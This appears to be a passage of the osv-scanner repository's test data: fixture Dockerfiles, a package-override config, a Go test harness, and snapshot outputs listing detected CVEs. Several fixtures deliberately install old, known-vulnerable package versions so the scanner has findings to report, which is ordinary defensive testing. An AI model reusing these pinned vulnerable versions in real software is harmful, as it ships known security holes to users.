the binary println!("Hello, world!"); } ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-image-with-deprecated.Dockerfile ================================================ FROM rust:1.91.1-alpine3.22@sha256:8efbfb788786eeb127adc581394349c5fb567712156e0f8c2e499acadbc23756 AS builder RUN cargo install 
cargo-auditable WORKDIR /app COPY test-image-with-deprecated/ . # Build project with auditable as per doc RUN cargo auditable build --release FROM alpine:3.22.2@sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412 COPY --from=builder /app/target/release/rust_novuln_deprecated /app/rust_novuln_deprecated ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-java-full.Dockerfile ================================================ # Use the official OpenJDK image as the base image # TODO: This has been deprecated and we might want to switch to another image FROM openjdk:25-jdk-slim@sha256:34f10f3a1a5b638184ebd1c5c1b4aa4c49616ae3e5c1e845f0ac18c5332b5c6f RUN apt update && apt install -y maven # Set the working directory inside the container WORKDIR /app # Copy the project files into the container COPY ./java-fixture/app . # Download dependencies with maven RUN mvn clean package FROM eclipse-temurin:21-jre-alpine-3.21@sha256:7832115c38e9359db1156f94f9228fdf1341388f17dbd9df6c45727d233d1f5f WORKDIR /app COPY --from=0 /app/target/my-app-1.0-SNAPSHOT-jar-with-dependencies.jar target.jar # Set the entry point to run the JAR file ENTRYPOINT ["java", "-jar", "target.jar"] ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-npm-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="10.2.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "npm@$MANAGER_VERSION" # initialize the package.json using the manager RUN npm init -y # ensure that we finish fully installed RUN npm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-npm-full.Dockerfile ================================================ FROM 
node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="10.2.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "npm@$MANAGER_VERSION" # initialize the package.json using the manager RUN npm init -y # install a few dependencies at specific versions RUN npm i mkdirp@0.5.0 RUN npm i -d cryo@0.0.6 # ensure that we finish fully installed RUN npm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-pnpm-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="8.15.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "pnpm@$MANAGER_VERSION" # initialize the package.json using the manager RUN pnpm init # ensure that we finish fully installed RUN pnpm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-pnpm-full.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="8.15.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "pnpm@$MANAGER_VERSION" # initialize the package.json using the manager RUN pnpm init # install a few dependencies at specific versions RUN pnpm add mkdirp@0.5.0 RUN pnpm add -d cryo@0.0.6 # ensure that we finish fully installed RUN pnpm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-yarn-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="1.22.22" WORKDIR /prod/app # install the desired package manager RUN npm i -g "yarn@$MANAGER_VERSION" --force # initialize the package.json using the 
manager RUN yarn init -y # ensure that we finish fully installed RUN yarn install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-yarn-full.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="1.22.22" WORKDIR /prod/app # install the desired package manager RUN npm i -g "yarn@$MANAGER_VERSION" --force # initialize the package.json using the manager RUN yarn init -y # install a few dependencies at specific versions RUN yarn add mkdirp@0.5.0 RUN yarn add --dev cryo@0.0.6 # ensure that we finish fully installed RUN yarn install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-package-tracing.Dockerfile ================================================ FROM golang:1.22.4-alpine3.20@sha256:ace6cc3fe58d0c7b12303c57afe6d6724851152df55e08057b43990b927ad5e8 AS build COPY package-tracing-fixture/ /work RUN cd /work && go get github.com/BurntSushi/toml@v1.4.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.4.0 RUN cd /work && go get github.com/BurntSushi/toml@v1.3.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.3.0 RUN cd /work && go get github.com/BurntSushi/toml@v1.2.0 && go mod tidy RUN cd /work && go build . 
RUN cp /work/ptf /work/ptf-1.2.0 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.3.0 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.3.0 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.8.1 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.8.1 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.5.0 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.5.0 FROM alpine:3.20.1@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 COPY --from=build /work/ptf-1.2.0 /work/ptf-1.3.0 /work/ptf-1.4.0 /go/bin/ # This tests when a file that exists in the final layer doesn't exist in one intermediate layer RUN mv /go/bin/ptf-1.3.0 /go/bin/ptf-1.3.0-moved RUN cp /go/bin/ptf-1.3.0-moved /go/bin/ptf-1.3.0 # This tests when a file only exists in an intermediate layer RUN cp /go/bin/ptf-1.3.0 /go/bin/ptf-1.3.0-copy RUN rm /go/bin/ptf-1.3.0-copy # This tests when a less vulnerable file overwrites a more vulnerable file RUN cp /go/bin/ptf-1.3.0 /go/bin/ptf-vulnerable RUN cp /go/bin/ptf-1.4.0 /go/bin/ptf-vulnerable # This tests when a more vulnerable file overwrites a less vulnerable file RUN cp /go/bin/ptf-1.4.0 /go/bin/more-vuln-overwrite-less-vuln RUN cp /go/bin/ptf-1.2.0 /go/bin/more-vuln-overwrite-less-vuln ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-python-empty.Dockerfile ================================================ # Use the official Debian image as the base FROM python:3.9-slim-buster@sha256:320a7a4250aba4249f458872adecf92eea88dc6abd2d76dc5c0f01cac9b53990 # Set the working directory in the container WORKDIR /app # Copy the rest of the application code into the container COPY python-fixture/main.py main.py # Specify the command to run when the container starts CMD ["python", "main.py"] ================================================ FILE:
cmd/osv-scanner/scan/image/testdata/test-python-full.Dockerfile ================================================ # Use the official Debian image as the base FROM python:3.9-slim-buster@sha256:320a7a4250aba4249f458872adecf92eea88dc6abd2d76dc5c0f01cac9b53990 # Set the working directory in the container WORKDIR /app # Copy the requirements file into the container COPY ./python-fixture/requirements.txt . # Install the Python dependencies RUN pip install --no-cache-dir -r requirements.txt # Copy the rest of the application code into the container COPY python-fixture/main.py main.py # Specify the command to run when the container starts CMD ["python", "main.py"] ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu-20-04.Dockerfile ================================================ FROM ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu-with-packages.Dockerfile ================================================ FROM ubuntu:22.04@sha256:ed1544e454989078f5dec1bfdabd8c5cc9c48e0705d07b678ab6ae3fb61952d2 # Install fzf from a existing build to keep it pinned to a specific version COPY ./sample-pkgs/fzf_0.29.0-1ubuntu0.1_amd64.deb /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb RUN dpkg -i /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb && rm /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu.Dockerfile ================================================ FROM ubuntu:22.04@sha256:ed1544e454989078f5dec1bfdabd8c5cc9c48e0705d07b678ab6ae3fb61952d2 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/ubuntu20-04-unimportant-config.toml ================================================ [[PackageOverrides]] name = "coreutils" reason = "Just want to test only unimportant vulns" ignore = true 
[[PackageOverrides]] name = "gcc-10" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "glibc" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "gnupg2" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "libgcrypt20" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "libtasn1-6" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "ncurses" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "pam" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "pcre2" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "perl" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "shadow" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "systemd" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "dpkg" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "gnutls28" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "tar" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "lz4" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "util-linux" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "zlib" reason = "Just want to test only unimportant vulns" ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testmain_test.go ================================================ package image_test import ( "log/slog" "testing" 
"github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/image" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{image.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/source/__snapshots__/command_test.snap ================================================ [TestCommand/.gitignored_files - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/.gitignored_files - 2] --- [TestCommand/Empty_cyclonedx_1.4_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestCommand/Empty_cyclonedx_1.4_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_cyclonedx_1.5_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestCommand/Empty_cyclonedx_1.5_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_gh-annotations_output - 1] --- [TestCommand/Empty_gh-annotations_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_sarif_output - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand/Empty_sarif_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_spdx_2.3_output - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-01-01T01:01:01Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" } ] } --- [TestCommand/Empty_spdx_2.3_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Go_project_with_an_overridden_go_version - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/Go_project_with_an_overridden_go_version - 2] --- [TestCommand/Go_project_with_an_overridden_go_version,_recursive - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Scanned /testdata/go-project/nested/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/Go_project_with_an_overridden_go_version,_recursive - 2] --- [TestCommand/Go_project_with_an_overridden_go_version_and_licences - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +--------------+-------------------------+ | BSD-3-Clause | 1 | +--------------+-------------------------+ --- [TestCommand/Go_project_with_an_overridden_go_version_and_licences - 2] --- [TestCommand/PURL_SBOM_case_sensitivity_(api) - 1] Scanning dir ./testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/PURL_SBOM_case_sensitivity_(api) - 2] --- [TestCommand/PURL_SBOM_case_sensitivity_(local) - 1] Scanning dir ./testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Filtered 1 local/unscannable package/s from the scan. Loaded Alpine local db from /osv-scanner/Alpine/all.zip Total 2 packages affected by 9 known vulnerabilities (3 Critical, 5 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9840 | 8.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9841 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9842 | 8.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9843 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/PURL_SBOM_case_sensitivity_(local) - 2] --- [TestCommand/Sarif_with_vulns - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///testdata/locks-many-with-insecure/package-lock.json" }, "parentIndex": -1, "roles": [] 
} ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [ { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///testdata/locks-many-with-insecure/package-lock.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'ansi-html@0.0.1' is vulnerable to 'CVE-2021-23424' (also known as 'GHSA-whgm-jr23-g3j9')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2021-23424", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2021-23424", "GHSA-whgm-jr23-g3j9" ], "fullDescription": { "markdown": "This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.", "text": "This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2021-23424](https://osv.dev/CVE-2021-23424)**.\n\n## [GHSA-whgm-jr23-g3j9](https://osv.dev/GHSA-whgm-jr23-g3j9)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This affects all versions of package ansi-html. 
If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-many-with-insecure/package-lock.json | ansi-html | 0.0.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-whgm-jr23-g3j9 | ansi-html | 0.0.8 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-many-with-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-23424\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2021-23424](https://osv.dev/CVE-2021-23424)**.\n\n## [GHSA-whgm-jr23-g3j9](https://osv.dev/GHSA-whgm-jr23-g3j9)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This affects all versions of package ansi-html. 
If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-many-with-insecure/package-lock.json | ansi-html | 0.0.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-whgm-jr23-g3j9 | ansi-html | 0.0.8 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-many-with-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-23424\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2021-23424", "name": "CVE-2021-23424", "properties": { "security-severity": "7.5" }, "relationships": [], "shortDescription": { "markdown": "CVE-2021-23424: Uncontrolled Resource Consumption in ansi-html", "text": "CVE-2021-23424: Uncontrolled Resource Consumption in ansi-html" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand/Sarif_with_vulns - 2] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/Scan_locks-many - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/Scan_locks-many - 2] --- [TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked - 1] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked - 2] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand/config_file_can_be_broad - 1] Scanning dir ./testdata/locks-many-with-insecure Scanning dir ./testdata/locks-insecure Scanning dir ./testdata/maven-transitive Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/maven-transitive/pom.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. 
Package npm/has-flag/4.0.0 has been filtered out because: (no reason given) Package npm/wrappy/1.0.2 has been filtered out because: (no reason given) Package npm/ansi-html/0.0.1 has been filtered out because: (no reason given) Package npm/balanced-match/1.0.2 has been filtered out because: (no reason given) Package Maven/org.apache.logging.log4j:log4j-api/2.14.1 has been filtered out because: it makes the table output really really long Package Maven/org.apache.logging.log4j:log4j-core/2.14.1 has been filtered out because: it makes the table output really really long Package Maven/org.apache.logging.log4j:log4j-web/2.14.1 has been filtered out because: it makes the table output really really long Filtered 7 ignored package/s from the scan. overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Alpine/alpine-baselayout/3.4.0-r0 with MIT overriding license for package Alpine/alpine-baselayout-data/3.4.0-r0 with MIT overriding license for package Alpine/alpine-keys/2.4-r1 with MIT overriding license for package Alpine/apk-tools/2.12.10-r1 with MIT overriding license for package Alpine/busybox-binsh/1.36.1-r27 with MIT overriding license for package Alpine/ca-certificates-bundle/20220614-r4 with MIT overriding license for package Alpine/libc-utils/0.7.2-r3 with MIT overriding license for package Alpine/libcrypto3/3.0.8-r0 with MIT overriding license for package Alpine/libssl3/3.0.8-r0 with MIT overriding license for package Alpine/musl/1.2.3-r4 with MIT overriding license for package Alpine/musl-utils/1.2.3-r4 with MIT overriding license for package Alpine/scanelf/1.3.5-r1 with MIT overriding license for package Alpine/ssl_client/1.36.1-r27 with MIT overriding license for package Alpine/zlib/1.2.13-r0 with MIT overriding license for package Packagist/drupal/core/10.4.5 with 0BSD overriding license for package Packagist/drupal/simple_sitemap/4.2.1 with 0BSD overriding license for package Packagist/drupal/tfa/2.0.0-alpha4 
